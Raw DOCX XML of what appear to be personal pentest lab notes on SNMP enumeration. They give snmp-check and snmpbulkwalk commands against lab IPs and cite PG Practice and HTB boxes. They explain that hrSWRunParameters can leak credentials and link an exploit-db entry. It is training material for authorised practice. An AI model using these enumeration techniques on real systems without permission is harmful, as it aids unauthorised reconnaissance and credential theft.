    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="783"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Software components (installed applications)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-check 192.168.118.149 &gt; snmp-check.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1087"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I like to save to text file and then copy and paste it into sublime text on my windows host since it is so much easier to look through output on my windows host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-check 192.168.118.149 -c public -p 61 -v 1 &gt; snmp-check.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1367"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Same as the command above but I just included flag to show how to use flags</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030EA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1083">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ClamAV</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030EC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="889000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="359" name="image344.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image344.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1084"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="889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0ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1477"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-check gives a BUNCH of information like host info and system info and processes. And here, they found a process (clamav) which is vulnerable </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1477"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Turns out (from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1085">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup) we could also find this exploit from SMTP version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1477"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId1086">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/4761</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—-------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pl5tzoh1z3nw" w:id="434"/>
      <w:bookmarkEnd w:id="434"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpbulkwalk </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F6">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's faster if you use v2 or v2c rather than v1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1087">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ClamAV</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpbulkwalk -c public -v2c 192.168.164.42 .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remember to keep the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" at the end which tells it to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> start from root OID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> retrieves all SNMP data available via SNMPv2c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from host 192.168.164.42 using community string public.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1114"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Faster than snmpwalk </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In both </w:t>
      </w:r>
      <w:hyperlink r:id="rId1088">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pandora</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB (14:00 minute mark) and </w:t>
      </w:r>
      <w:hyperlink r:id="rId1089">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mentor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB (25:30 minute mark)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hrSWRunParameters</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">leaking user and password credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003100">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like if you do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 login.py -u michael -p 123</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u michael -p 123 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">will show up in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hrSWRunParameters </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 login.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will show up in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hrSWRunName </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003101">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003102">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103">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m6ifafi2voia" w:id="435"/>
      <w:bookmarkEnd w:id="435"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003104">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003105">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">= the raw numeric address of a value.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003106">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MIB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = the library that tells you what the OID means, how to interpret it, and gives it a human-friendly name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003107">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003108">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:hyperlink r:id="rId1090">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://secybr.com/posts/snmp-pentesting-best-practicies/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003109">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000310A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Standard numeric OIDs (1.3.6.1.2.1…, 1.3.6.1.2.1.25…) are universal across OSes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000310B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
